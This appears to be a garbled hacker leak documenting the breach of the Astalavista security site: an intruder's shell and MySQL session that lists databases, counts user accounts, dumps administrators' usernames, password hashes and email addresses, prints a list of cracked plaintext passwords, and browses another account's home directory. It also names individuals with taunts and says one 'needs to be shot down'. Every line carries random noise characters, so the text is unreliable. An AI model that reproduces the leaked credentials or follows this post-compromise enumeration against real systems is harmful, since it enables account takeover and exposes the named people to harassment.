) i# ^+ r, T! V j- I <title>ASTALAVISTA.com - Exploits</title>6 ]5 k& b) m# `, T& }
<link>http://www.astalavista.com/exploits</link>
2 E; Z7 q1 W: i4 [ <description>All availably Exploits.</description>
( d7 ?5 ~, B* B6 s9 I$ n1 ? <language>en-us</language>
$ p( `9 f2 j/ i0 T <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
' }! Z* r2 \4 \3 P* a <docs>http://blogs.law.harvard.edu/tech/rss</docs>' K6 z9 [5 c+ w7 p; {
<generator>Astalavista.com</generator>
. a! v5 |0 |1 e) T/ {5 ]7 h" Z <webMaster>info@astalavista.com</webMaster>’ . $items . ‘ }. x0 Y( H y
</channel>8 U3 I" W. `) B1 P$ P
</rss>’;
" B2 J5 [5 n) ?9 F! s
7 M ^7 [* L4 p; B; e if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {9 ^6 [% r# s$ p5 q, E1 @* {
unlink (FULLPATH . ‘/feed/exploits.xml’);- r |/ O6 q' z
}6 f; [) l' q( N2 _! _# ]. K2 z
! n- \) P' K( I
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
3 W' T, K( C) l; l3 ^* r/ F7 L# `[snip]% U6 x* j! O" ~+ l( \" D
& v; `9 Z w+ ^4 tsh-3.2$ cat exploits.sh/ c9 O/ H/ ^6 @* z+ d8 Y+ Q
#!/bin/sh [8 D( M' F% q
! }4 V% G: D& n5 D: i1 c$ B
###########################################################
! c) Y( p/ M) i- D0 W# #
7 a4 w2 x$ Z; s7 ?4 E% ^# Title: milw0rm exploits adder #% Q1 w. h. f3 A0 ^; l( d) T
# Description: Add all milw0rm exploits to the #
- Y4 @( j6 g) g/ }( \# Astalavista.com database #
. m$ V& f# D$ a' ^! s9 g# #
& P* O1 j4 S( U" U+ _+ A* W; k& G# Company: Astalavista Group #+ C2 p0 ^; R) w$ r. A" c
# Author: Paulo M. Santos #
* c9 z+ i; a" U; H: j# E-Mail: 链接标记paulo.santos@astalavista.ch #
1 j9 b1 `% O+ o, [. Q& ^, i- r# #- f) {# H+ U1 [
###########################################################8 F! h9 K+ m1 F7 n' s" N
6 B; t# P$ b/ r' H, P# |
# path7 g. M* n7 s+ D8 Q9 [
this_path=/home/com/public_html/modifications/cronjobs- R1 T- p( p7 C" k
) Z4 P8 R, i7 Z( r7 J# }# change directory, N* C$ O4 z2 M
cd $this_path% Q) G( \1 ]4 @4 q( m
cd tmp// f7 z! ~0 H3 Q
5 m/ ]0 }% t' M) d( ^
# delete files* s/ J! r* Q7 t7 {% p: C) M0 t- N5 y9 n
rm -rf milw0rm.tar.* &, e$ F1 T' p# T
rm -rf milw0rm/ &0 G1 X" Q5 M# D+ t" D1 |
/ m' }3 z" E, {# |$ ?8 e# wget milw0rm paket
0 O/ Q* v- a4 jwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
/ J s3 E+ m' |( v/ k" i6 e) \# J }7 M0 Z* c# {9 n/ Y& V& Z
# extract milw0rm paket; @- O/ E% e& Z0 h9 q* R& p' Y
tar -xvf milw0rm.tar.bz22 [% F5 c% Y1 u0 ^; y+ M
# \- H/ j) J, ~8 x
# change owner
: s2 d1 J" r, W. P3 B3 H6 Gchown -R com ./ l ?- @0 w* |' A+ D
chgrp -R com .
& j u: B4 }& j/ z0 ]+ }" n9 ? r; P4 ?, m8 f" v; ~ m
# execute php script
1 w, V; n* O3 \ p, |/ e$ O6 S$ dcd $this_path& C7 N+ m* @) R" K$ e
php -q exploits.php( f1 u- Y, C4 K& A% x* ]/ a8 w
: \: ^& \- ^( E# delete files
8 i. I9 t' O9 _' {; F$ grm -rf tmp/milw0rm.tar.*3 S/ M, h; }* H1 E
rm -rf tmp/milw0rm/
3 L& u. |+ T6 b2 f9 ?+ h+ K
0 Q/ y, k1 C$ f/ R! W4 Ysh-3.2$ echo “Paulo M. Santos needs to be shot down.”
" G, z( Q5 j, M9 `Paulo M. Santos needs to be shot down.
/ x! j& v, Y4 L" f9 [+ ]/ G5 j% c9 W- d" m& W( t. Z
mysql -u contrexxuser2 -p; b3 `( j) Z3 N) t; i- g
Enter password:
) K+ a; t! F0 q" V hWelcome to the MySQL monitor. Commands end with ; or \g.2 s9 Q0 b6 h4 e9 N
Your MySQL connection id is 261694
+ e( D$ [+ S: m; [Server version: 5.0.45-community-log MySQL Community Edition (GPL)
. d9 w3 C1 }! o$ b) W8 H; k, U' |2 Y
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
1 E& q# C( G& i5 g. ?4 Q
) \- l1 B; J8 q R, }9 c Emysql> show databases;
0 j. o. s! o( K6 A) p; x# k8 I+——————–+
8 T/ p8 [- `% }" b( N| Database |
, X" T3 j5 N& E+——————–+# F: z1 E, e" W9 d; J
| information_schema |) v9 {1 ]) X" v
| com_contrexx2 |
' ~; X# W' Y0 D3 t| com_contrexx2_live |
; e' D4 D2 w. U7 J5 k( F9 K9 S+ H| test |6 m: I# ^$ \# @, m; M
+——————–+% w2 a3 |0 S9 Q; @
4 rows in set (0.00 sec)
! G" D( Y5 H* Y' M' M/ s1 e% |
; M% N& H& T2 |& |8 M8 w" vmysql> use com_contrexx2_live
: c- d2 ?2 h- Q; g( rDatabase changed R% s$ A9 o3 K1 x! R6 q
mysql> show tables;
' w# v; g8 @7 k+————————————————–+
2 w# @* F! F5 }$ f- g| Tables_in_com_contrexx2_live |
7 c! @' i! H3 s, g! i+————————————————–+% ^; F; |& {6 C$ A* Z6 v
| cc_banner_counter |& D1 M0 t, `! S D" k! Z
| cc_search_counter |" y: f; `; f- [3 g8 z9 z8 k- C4 ~
| contrexx_access_group_dynamic_ids |$ q, P! |/ \" \ \: K! z
| contrexx_access_group_static_ids |+ X% `) u" L& b* m9 m: p8 f( c) c# E
| contrexx_access_rel_user_group |7 X( j# t/ n3 C' w* s3 p
| contrexx_access_settings |2 \7 t$ {' \) Z# p
| contrexx_access_user_attribute |$ h1 w+ ~5 \+ t
| contrexx_access_user_attribute_name |, R; F- U5 C! g* {
| contrexx_access_user_attribute_value |
M2 O+ N8 c# B& e) u# ?$ T# ?| contrexx_access_user_core_attribute |
( u+ q# ?0 B3 l1 [) I$ F0 b$ [+ _# b| contrexx_access_user_groups |
' K2 C9 L7 ? F| contrexx_access_user_mail |5 V8 }0 ]* N! v# y$ w% Y2 e( ?: ~& S
| contrexx_access_user_profile |
: C a- Y" A3 Q. b, S6 k& x: n| contrexx_access_user_title |4 X) e' q* k/ \: @2 a2 O0 m
| contrexx_access_user_validity |* y) Y$ \7 o; {3 v' d9 F
| contrexx_access_users |
, F# l# G/ h2 g2 v) a$ `| contrexx_backend_areas |
) J2 `7 {6 u- H, J| contrexx_backups |
/ E$ S% T+ J2 H3 C h| contrexx_content |- p8 T( k+ Q/ A
| contrexx_content_history |
8 _1 J2 V! ?& Y" q' O! s9 T. n1 I| contrexx_content_logfile |/ s8 t( D' v2 A* m6 j
| contrexx_content_navigation |
# \! J1 c; |# p, l4 H: i' Y- W' X| contrexx_content_navigation_history |
$ {& j9 T# [% ?| contrexx_ids |
% X: d* J! F" W' ?9 ^7 K+ u| contrexx_languages |! Q* B% ]# o5 t& O
| contrexx_lib_country |
: M6 b5 O' S( F' Z' Z0 t| contrexx_log |
" y9 A1 N8 ], X9 c9 v5 |! ?) r| contrexx_module_alias_source |
, J1 K1 J8 r' k, d8 U| contrexx_module_alias_target |$ |: N1 ]% x( [, T3 X
| contrexx_module_block_blocks |5 |! z( Y$ k) H4 Q9 p) w
| contrexx_module_block_rel_lang | |# j e6 W, e4 g( ?/ Q
| contrexx_module_block_rel_pages | p/ s. f# D% r: Q2 Q# u/ q/ L$ G
| contrexx_module_block_settings |9 g. L) L; L: V8 |! q& E
| contrexx_module_blog_categories |8 X" @. c' S3 n& Z' K
| contrexx_module_blog_comments |
; _- h3 B. @- Y9 @9 a) s| contrexx_module_blog_message_to_category |1 D- u% `1 z9 l' D; C9 `( Z' m5 E. o
| contrexx_module_blog_messages |5 S, `9 e' A& G# L% x4 w) l/ |
| contrexx_module_blog_messages_lang |; p0 R2 ~, |& K" m9 u, G: p
| contrexx_module_blog_networks |
# D/ V! v. J& A9 Y8 ]- y, N/ z: r| contrexx_module_blog_networks_lang |
/ P+ ?# E& E3 m$ E& u| contrexx_module_blog_settings |
% u+ }) g% v! e| contrexx_module_blog_votes |: G. [( C& W$ V4 ~+ U3 c! [
| contrexx_module_calendar |
; q: l% R6 j, A7 k# @1 C+ v| contrexx_module_calendar_access |/ v1 _" o% |, S4 Y8 N1 v7 {% H/ k
| contrexx_module_calendar_categories |" z% e0 I5 M2 z# n V' f6 @- `# b9 s
| contrexx_module_calendar_form_data |
( |, u) A* z% l- h3 o4 H; j| contrexx_module_calendar_form_fields |1 P, a: P+ V. k$ ~/ \0 u( I+ H5 W2 ^
| contrexx_module_calendar_registrations |- q$ c! w* R% l: Q4 a
| contrexx_module_calendar_settings |. {! p, b" l* E! t% w5 `
| contrexx_module_calendar_style |3 F1 F# f/ m; I, t
| contrexx_module_contact_form |
. u$ X6 m, u6 y% C5 N4 B* ]| contrexx_module_contact_form_data |
1 {6 k0 U4 i" r" F' c& V| contrexx_module_contact_form_field |# h3 l. a8 D k
| contrexx_module_contact_settings |+ B; h% S% } o- D; _. S7 B: F
| contrexx_module_data_categories |7 q: j; v* L2 W
| contrexx_module_data_message_to_category |2 x( Y0 R" o% I8 x# B" e2 v/ n
| contrexx_module_data_messages |
5 c! y: Y% I! L2 E| contrexx_module_data_messages_lang |" i6 A4 N: g+ @4 o/ J
| contrexx_module_data_placeholders |3 S2 P4 Z( \3 R/ E* I5 n: I, e3 [" O
| contrexx_module_data_settings |
- u6 U8 B5 ]7 O2 \3 D, z| contrexx_module_directory_access |/ m0 l* o. Z8 [# v. \3 j$ y
| contrexx_module_directory_categories |
) c( k. ^& t s( Y| contrexx_module_directory_dir |
4 I4 b' |, Z5 _. q( l9 u/ T- H| contrexx_module_directory_inputfields |
7 q& l; P+ B# W# h' j& Y5 }| contrexx_module_directory_levels |
* I L7 D5 V1 ]! O) k- n& Q. L| contrexx_module_directory_mail | x$ G- h" h: t# y- ~: M
| contrexx_module_directory_rel_dir_cat |
" f; }2 w' G1 W1 {| contrexx_module_directory_rel_dir_level |' r: m$ R: n* n; O& z
| contrexx_module_directory_settings |+ N$ n9 R/ f4 \1 P
| contrexx_module_directory_settings_google |( z: R4 ?" b$ D g2 V1 ?
| contrexx_module_directory_vote |7 d5 l0 J* R0 u" h$ |7 }
| contrexx_module_docsys |
. @' {# C$ e Y7 x3 u9 x; V7 e| contrexx_module_docsys_categories |# D" r7 E8 s/ v7 l: O' H9 @7 V
| contrexx_module_egov_configuration |( a, {0 {: m% p) m* a; J
| contrexx_module_egov_orders |
' Y. G- J y; T% L& {| contrexx_module_egov_product_calendar |0 p& |( S6 M) r$ I
| contrexx_module_egov_product_fields |
" R3 ~! h1 e' b7 b2 d& `/ W| contrexx_module_egov_products |5 C, P/ s( J( h
| contrexx_module_egov_settings |5 K5 ]- i1 B& h8 h: V
| contrexx_module_exploits |
: a; V! s' y6 `- ?| contrexx_module_exploits_categories |3 T0 |1 f& ^; }
| contrexx_module_feed_category | O4 c8 K p. g( r
| contrexx_module_feed_news |# {9 l3 j3 G7 p3 G9 v) F) i
| contrexx_module_feed_newsml_association |
9 E1 ~5 h: u( }4 t( U: { ?! c; V| contrexx_module_feed_newsml_categories |
3 h6 c- P) h7 p- `( P| contrexx_module_feed_newsml_documents |+ b2 n$ a' W; w8 a# F6 ?
| contrexx_module_feed_newsml_providers |
, p; J$ x4 q+ ^4 ]7 t. _9 }1 a; _| contrexx_module_forum_access |
3 D0 @& g3 O+ o: C$ p| contrexx_module_forum_categories |3 m" _! L' E/ M$ s7 ^ ~* r# [- W
| contrexx_module_forum_categories_lang |. F0 Q' l) D; z7 Q* w
| contrexx_module_forum_notification |
. F( S7 G5 E8 y1 m5 ^| contrexx_module_forum_postings |
) h! N9 \5 u0 r' E, M| contrexx_module_forum_rating |1 q9 f: [+ [; y% R! S
| contrexx_module_forum_settings |0 P4 t& F" P8 n7 s/ H
| contrexx_module_forum_statistics |: _$ J* d% E+ W! ]
| contrexx_module_gallery_categories |
6 C \0 e4 `- Y @0 r4 C$ y! S9 ]4 F| contrexx_module_gallery_comments |9 ~9 p0 k7 {0 @ H; S7 s+ W% h+ r2 \+ G
| contrexx_module_gallery_language |* r" O7 G" w/ f5 S, @
| contrexx_module_gallery_language_pics |
+ z& {$ J. B, r7 m% p$ l; F| contrexx_module_gallery_pictures |
# S4 r* v& x5 ]| contrexx_module_gallery_settings |/ `' Y9 c! H! G
| contrexx_module_gallery_votes |# _& L( p) D1 K8 i2 g5 p) k H
| contrexx_module_guestbook |8 g* r" q2 I! x* O( P/ x
| contrexx_module_guestbook_settings |) A3 u! A0 J% {. E6 U3 C
| contrexx_module_livecam |
* g. p2 n( z4 i* A& a| contrexx_module_livecam_settings |
6 S! F5 L) X3 L" Y| contrexx_module_market |* H- B( P) l, m9 o) i: n
| contrexx_module_market_access |
' F/ Y) }. }: S5 i* p- j| contrexx_module_market_categories |
: l$ r5 k& c( G; Y" I2 ^| contrexx_module_market_mail |
# @& F' N, y) \. O0 i; D9 Z| contrexx_module_market_paypal |) ^" K( q! R4 ?8 {- O
| contrexx_module_market_settings |8 ?$ K2 j; T5 Q, ~5 s* ^* I" `
| contrexx_module_market_spez_fields |
9 x+ B A h; e3 s g$ C5 y| contrexx_module_mediadir_access |
$ o" r6 b3 s" `3 v- U| contrexx_module_mediadir_categories |
* @. q) a d# r/ T9 ?5 X# t( W7 f- w6 N| contrexx_module_mediadir_comments |' q4 `5 k" L# E1 R
| contrexx_module_mediadir_dir |3 D! `& {4 ~* }& s2 V0 s1 j
| contrexx_module_mediadir_inputfields |! H$ e$ M j4 t. @
| contrexx_module_mediadir_levels |
; F' Q% \2 q9 W) a8 H| contrexx_module_mediadir_mail |
. C( V- R! Q3 B& x6 T# J| contrexx_module_mediadir_rel_dir_cat |
0 M# ^! o0 L' ?9 \: e" f| contrexx_module_mediadir_rel_dir_level |: S3 B% ~& p9 ]4 Z
| contrexx_module_mediadir_reports |
- b; Y/ ]- n$ \' S4 k5 O- c9 ?: ^. L| contrexx_module_mediadir_settings |
m6 j3 |3 P7 x& j, j9 K| contrexx_module_mediadir_settings_google |& w2 S* X9 v$ u/ A1 Y
| contrexx_module_mediadir_vote |% H) ?8 d7 Y! t' B" G# M) Z( O$ W
| contrexx_module_memberdir_directories |
& Z0 A1 H! I8 }7 t* j0 H. Z| contrexx_module_memberdir_name |- O5 b3 Z1 C: K6 r
| contrexx_module_memberdir_settings |/ X$ B0 x/ `# g7 |
| contrexx_module_memberdir_values |
# c, u3 P. V, H; o1 l| contrexx_module_nettools_allowed_groups |
" S6 `; }; r* a2 o7 K| contrexx_module_nettools_settings |! N; a( M, h4 B2 L+ l# B4 V
| contrexx_module_news |/ M* F- [! X, n: _' K; p1 L
| contrexx_module_news_access |
( r* ~4 Y' _4 E: M| contrexx_module_news_categories |
5 J6 g) Q t% u| contrexx_module_news_settings |7 K# O8 z% H3 Q9 y# l d
| contrexx_module_news_teaser_frame |
7 M; k/ }+ q% h9 l" t* H$ L( o3 h| contrexx_module_news_teaser_frame_templates |( O9 x! z6 H, r3 j: j% r9 @
| contrexx_module_news_ticker |
% L' y$ Z5 i% F/ L| contrexx_module_newsletter |
. _+ l5 k. `; R* V2 `| contrexx_module_newsletter_attachment |# R- o- ~ P2 T- Z! T
| contrexx_module_newsletter_category |" X6 h% S! H6 o# A- X( O9 ]
| contrexx_module_newsletter_confirm_mail |
/ ]3 ]; f+ O3 A% [4 i| contrexx_module_newsletter_rel_cat_news |
6 v) ~+ Z9 i/ O g# X: S( x. `| contrexx_module_newsletter_rel_user_cat |6 S4 \/ J" W4 W
| contrexx_module_newsletter_settings |7 W2 a* i) I4 S1 d# T+ F- O- z
| contrexx_module_newsletter_template |
; U5 t" f; D( a) W| contrexx_module_newsletter_tmp_sending |
% G5 |0 y4 n% ~4 M. Y/ f4 [/ S$ ~| contrexx_module_newsletter_user |
& M4 r( {) y3 R) n9 O5 n| contrexx_module_newsletter_user_title |4 _6 E# d% |$ ]" ?
| contrexx_module_onlinetools_defaultports |
- Q1 V: F) j% M1 E| contrexx_module_onlinetools_defaultports_back |; O% h. `6 o0 V: g
| contrexx_module_onlinetools_geolitecity_blocks |
; u+ l! L. V6 C; B% O, m1 U0 b| contrexx_module_onlinetools_geolitecity_country |
: B$ r" i$ M% `$ Z# H o0 B0 Z1 e| contrexx_module_onlinetools_geolitecity_location |
# B$ F Z+ U; C. P| contrexx_module_podcast_category |- w7 s4 ` v" h
| contrexx_module_podcast_medium |
9 [& M0 T7 s( N' \2 N# i| contrexx_module_podcast_rel_category_lang |+ F# N( k5 t Y3 z$ T
| contrexx_module_podcast_rel_medium_category |! z- u3 w4 O( S. w: _+ C' D
| contrexx_module_podcast_settings |
$ g2 i7 L7 m/ j3 g# H| contrexx_module_podcast_template |
# r, S8 x7 k. n8 I& c: T5 X+ E" p| contrexx_module_proxydb |
, W7 K$ T# g% P$ i$ ]| contrexx_module_recommend |
, |/ n' e! z& ]% t. V| contrexx_module_repository |
1 W% D; e5 h5 T( W) f+ `| contrexx_module_securitynews_cats |
% v+ x8 |& m: z( w: w- W| contrexx_module_securitynews_feeds |& i) u* p3 |5 R1 a3 z4 J' z2 b+ e
| contrexx_module_securitynews_news |* x. r; H3 o$ z" O$ t% ]
| contrexx_module_shop_categories |' d+ ]+ W% z0 W i' A: a
| contrexx_module_shop_config |
: g( V% n9 r' u! L. Q, r| contrexx_module_shop_countries |2 c$ a7 l& `; l
| contrexx_module_shop_currencies |( m+ V( y2 k; o7 a; @
| contrexx_module_shop_customers |: L3 o( c9 X- ]* J0 \
| contrexx_module_shop_importimg |
; \ N+ a3 m3 I7 k0 K3 v6 x( _% f| contrexx_module_shop_lsv |# S) M* j0 M( M1 y9 P+ q8 n1 \
| contrexx_module_shop_mail |
% C0 _1 T' O4 o1 J- U+ c6 I| contrexx_module_shop_mail_content |% a5 e, p, ~. Q) k, U+ s
| contrexx_module_shop_manufacturer |2 A- z0 Z0 ]8 {. }
| contrexx_module_shop_order_items |
. I9 K5 k" ]! C4 f| contrexx_module_shop_order_items_attributes |
e& D4 \9 P/ r6 _& U. h* M| contrexx_module_shop_orders |+ E- E7 N% ]: V$ u9 V0 y
| contrexx_module_shop_payment |% n" m' `: H$ J3 x# Y1 L1 ~
| contrexx_module_shop_payment_processors |
* Q3 n6 p1 J! ~9 R! x7 W7 Y% Z2 |+ O| contrexx_module_shop_pricelists |. t- W! r: a2 L/ Z6 U
| contrexx_module_shop_products |
2 N( {8 Q) h6 `4 v0 L$ u| contrexx_module_shop_products_attributes |9 r8 v p/ R! ^) r
| contrexx_module_shop_products_attributes_name |
; l2 u% j9 f% T| contrexx_module_shop_products_attributes_value |
" N/ N8 x7 _! U; v/ v" X+ o' f7 x| contrexx_module_shop_products_downloads |. P) n" F: x% W, \5 V' n) k
| contrexx_module_shop_rel_countries |4 m" A2 y5 | T6 i0 Z
| contrexx_module_shop_rel_payment |
! ~; Z+ m# v( f/ f7 T" k| contrexx_module_shop_rel_shipment |
+ t% o( p. d/ b5 I" ?0 ^) L| contrexx_module_shop_shipment_cost |
* S. x8 u( P6 k! I8 X6 R3 o6 k, Z| contrexx_module_shop_shipper |
/ w h; w# r9 b+ R8 D| contrexx_module_shop_vat |
G Y4 k7 ?! [2 j| contrexx_module_shop_zones |
" o' j# Z, |6 \6 ?4 W| contrexx_module_u2u_address_list |, P: ]3 s$ J+ S# v
| contrexx_module_u2u_message_log |9 l+ y$ M: W" T7 p0 ]7 g( d3 p
| contrexx_module_u2u_sent_messages |
. F9 P) Z4 ?0 S& K& P| contrexx_module_u2u_settings |
# O. _7 e8 O! I5 o| contrexx_module_u2u_user_log |5 o6 i4 m3 r4 b2 p, Y
| contrexx_modules |0 Q- R7 h9 o% N* |& M" N
| contrexx_sessions |
1 _) W7 c) H; {% `5 O+ ?| contrexx_settings |5 J R2 V% S; ~$ e
| contrexx_settings_smtp |
0 X% h# P( \) K7 _| contrexx_skins | d1 C& x/ B: W6 G
| contrexx_stats_browser |
" R# e4 M2 N6 e, `& s3 R- b1 e| contrexx_stats_colourdepth |0 Q5 K+ C6 t8 y3 j5 z# h
| contrexx_stats_config |
* i7 Y7 l8 B8 L! G, _- i6 c9 m) }| contrexx_stats_country |+ o! z: c) h1 m( Z7 }/ R
| contrexx_stats_hostname |( }$ x( s1 q6 Y5 ^
| contrexx_stats_javascript |
& f* y3 l2 P! t# m7 n: T& T! u| contrexx_stats_operatingsystem |
: m( ^% Y8 A7 `+ W9 R( v( ]7 j| contrexx_stats_referer |; B6 O x" I, v- ?
| contrexx_stats_requests |
" j6 ~: F5 h, s2 t| contrexx_stats_requests_summary |" e \# O3 X X" A8 v ?8 d/ O$ M5 @& e
| contrexx_stats_screenresolution |
) X' u4 P5 ]) B* A: k+ l4 `0 ?| contrexx_stats_search |6 s: ]0 j1 f. [5 Z6 _
| contrexx_stats_spiders |
6 f5 d; Z' D& c- [/ x* h| contrexx_stats_spiders_summary |8 W9 y& g2 D, Q( ]3 e# [( R
| contrexx_stats_visitors |- E" t4 B u5 q7 T4 ~
| contrexx_stats_visitors_summary |
2 `' p' {3 S3 e) c" P! y- a* M4 J: p| contrexx_voting_additionaldata |3 ~ w( r H/ u3 i: v% y
| contrexx_voting_email |
8 ~# k1 ^/ c! i| contrexx_voting_rel_email_system | X6 ~! j' n( O+ {0 `1 ]6 }; g Y/ \
| contrexx_voting_results |
" e7 }# g- C( J h| contrexx_voting_system |
6 M- J X, C! @| foo |; h- [) t) j1 f
+————————————————–+7 G. I) l" e+ _7 h' c4 }' ~
227 rows in set (0.01 sec)* B4 Z. o7 @3 o8 g
[* |4 [" n. M7 a. |mysql> select count(*) as skids from contrexx_access_users;/ r/ r3 w( A& S$ }% ~" a& d% I; [2 C
+——-+
4 C, g7 d8 I3 V9 S" k| skids |
- o I, O2 t8 ~- G/ B- N9 `/ ]+ h+——-+1 M4 d- V5 L& K7 d
| 53699 |7 {! e5 g2 y1 m; X# \
+——-+, u+ K. X. K/ f8 D: d) t( I
1 row in set (0.00 sec)6 e8 z4 n( d% M. [
% m& P* Y5 S+ d" j0 g" {
mysql> describe contrexx_access_users;
, c& S m c' M" i7 C- U+ `! R* S) {8 Y+——————+——————————————+——+—–+————–+—————-+3 v1 a! a2 s5 \, a# ] l
| Field | Type | Null | Key | Default | Extra |
4 n# S0 D) P7 Q: Q1 J+——————+——————————————+——+—–+————–+—————-+
# u; M$ k' j- N$ t( w6 s8 n| id | int(10) unsigned | NO | PRI | NULL | auto_increment |* g) d Q* i# a7 V9 d, F
| is_admin | tinyint(1) unsigned | NO | | 0 | |
& y: [+ W& @ }| username | varchar(40) | YES | MUL | NULL | |+ ?5 u8 _! v! {4 D8 ]- c
| password | varchar(32) | YES | | NULL | |
% _% a0 N& a: V| regdate | int(14) unsigned | NO | | 0 | |3 h4 b& p8 A5 X) B; {
| expiration | int(14) unsigned | NO | | 0 | |' X6 ]4 U. ~3 m. T Y& U8 _# f# X
| validity | int(10) unsigned | NO | | 0 | |5 R/ m, m, V# V" G" N
| last_auth | int(14) unsigned | NO | | 0 | |# M+ N: w1 A* _& y- C" U! z$ O
| last_activity | int(14) unsigned | NO | | 0 | |$ u: }$ _0 ]- k, I/ D& M
| email | varchar(255) | YES | | NULL | |
7 U) M5 l& J& _$ h| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |; E( H3 Q6 j- Y! k B
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
! c" E+ O6 B$ [1 X: M; e| backend_lang_id | int(2) unsigned | NO | | 0 | |
6 M' C D- U4 F/ W+ R- E2 `+ _| active | tinyint(1) | NO | | 0 | |
5 I% Z' f- h! L; \( J# a9 C| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
/ i% z$ p% M6 || restore_key | varchar(32) | NO | | | |; q7 s' J U$ s
| restore_key_time | int(14) unsigned | NO | | 0 | |
: Q* ^$ N# ]: S- t" B8 k* k8 \ t| u2u_active | enum(’0′,’1′) | NO | | 1 | |1 ^3 n0 l1 E( d* ^* w0 ?: d/ @. `
+——————+——————————————+——+—–+————–+—————-+
9 e1 W# ?" X* S2 u4 n. b& \5 O18 rows in set (0.00 sec)
5 y Z; I- @* O8 m/ v0 f$ Z& T
: o5 ?, f$ h2 p$ C- W. o/ k! kmysql> select username,password,email from contrexx_access_users where is_admin = 1;9 S% w6 U: Q* s8 j
+————+———————————-+—————————–+
& q5 C6 v: S4 i| username | password | email |
) Q% H! p9 [" d7 w6 _& x% t+————+———————————-+—————————–+; k3 ~; @; \( x
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
2 o5 [, w$ L w$ |' ?5 w- t| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |! y/ n* O5 u2 L3 H4 |4 G( K
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |) i; c' L" q) y: w8 S+ u' h
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
, k+ o9 P& C2 D% A+————+———————————-+—————————–+
, ?0 {8 o. p/ G3 q- c {* { ]4 rows in set (0.04 sec)7 i9 |( J6 i0 k6 b/ ^
+ a* O5 V+ {8 gmysql> exit;
0 E3 [9 q q; M" V0 g% _Bye* |; |) T4 T" h! p& S
5 V; e/ P! M& g) F
[~] There you go, your “team of security and IT professionals” is a joke.: s2 L! f H: \
/ O6 H6 e$ f9 |+ \/ B7 h( J0 r! }( d+——————————+
$ s, u/ V+ _3 O2 xsystem:f82BN3+_*' n+ u# e) J q$ H" p1 k; o( |
Be1er0ph0r:belerophor4astacom0 g# H" z' P9 K* u* t; P
prozac:asta4cms! E; F8 D' R. F
commander:mpbdaagf6m1 `& T7 F4 m0 N
sykadul:ak29eral! c/ \* J6 `* E8 W) r
+——————————+9 o/ m. [& a4 w5 L8 n
8 q& G+ s: p6 X6 {# V0 x
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
4 t/ s/ x; x; }5 n" r…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.) T7 Q# s: X8 l
) Q8 E" } h; E
[~] Lets move to astalavista.net now,/ C. p; D/ p' [; y& j) u8 ]
2 z3 p3 Z3 f \& }4 dFrom <链接标记[url]https://www.astalavista.net/[/url]>:+ e( @4 @4 @2 f+ G+ V
>> Everyone knows that the best defense is a good offense.
+ l1 ~( h) r; n8 [# V* u>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
( Y2 z- v& o4 a |# h, @6 m>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.- z _6 P Z% C+ @+ |) T
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
% t* T8 ]( R3 q$ r2 K7 N) u& {/ S8 p/ z; U$ G* d
>> Go ahead, try and hack our server . in a completely legal way!
0 D3 M! H/ L2 M2 q" {3 ^>> Learn by doing: We offer our members tricky tasks and challenges on an
( z) Y# ]/ V1 R6 q u2 l5 X>> ongoing basis so you can test your knowledge and abilities. You can also& w3 G$ [* D- m; T$ e1 M
>> demonstrate what you.ve mastered by taking part in regular hacker contests
8 D1 J( B4 c+ `6 f, U. J( V6 ~>> and war games
5 A; j4 N- v: L1 P' O. Z$ A
& `! u. A* O$ C7 F' C[~] Lets take a look there, after all… they are hack-proof, aren’t they?!. p) H2 N1 i6 K5 _5 A) B7 A
7 r$ u; s6 }- N' |[-] Tricky task: Find home dir of astalavista.net
0 H) r4 W$ ] A) B+ p$ `9 \2 f% d: u% @8 w( X: ~ ^7 ~" O
sh-3.2$ ls -la ~astanet" B i8 T. h# ~: S' K) N
total 48
2 t3 }) G: P( ]drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .7 ]2 E/ }0 S; r5 F4 ]
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
8 m' n* l5 y. Vdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth* R( T6 u1 o- D0 D8 t# t+ a
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history* P1 y; }0 b9 n1 o8 O- S" i; X( k
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout9 A- r* W: x+ I6 ~" Z* z
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
5 Y+ }& @* M" w( D/ ?' y-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
2 b1 Y5 X4 K$ d) @1 f: N# ddrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains3 b; ]8 Q0 B4 }7 V' n
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap6 l7 e' G& E1 `5 [7 A: l* H* A% T
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail$ O+ }! |% Z- e5 A. N
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html7 W# R- `0 b7 X
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow; ^' i* ]0 {# _* D
' w* t9 S: ^, o& K& J* ^sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
* ^2 R& m( a' N$ R# Esh-3.2$ ls -la, m5 P3 K7 }5 r6 j8 ]
total 2006 j1 V# K7 _" q1 h4 I* J
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .* R4 B) T; g. \6 M
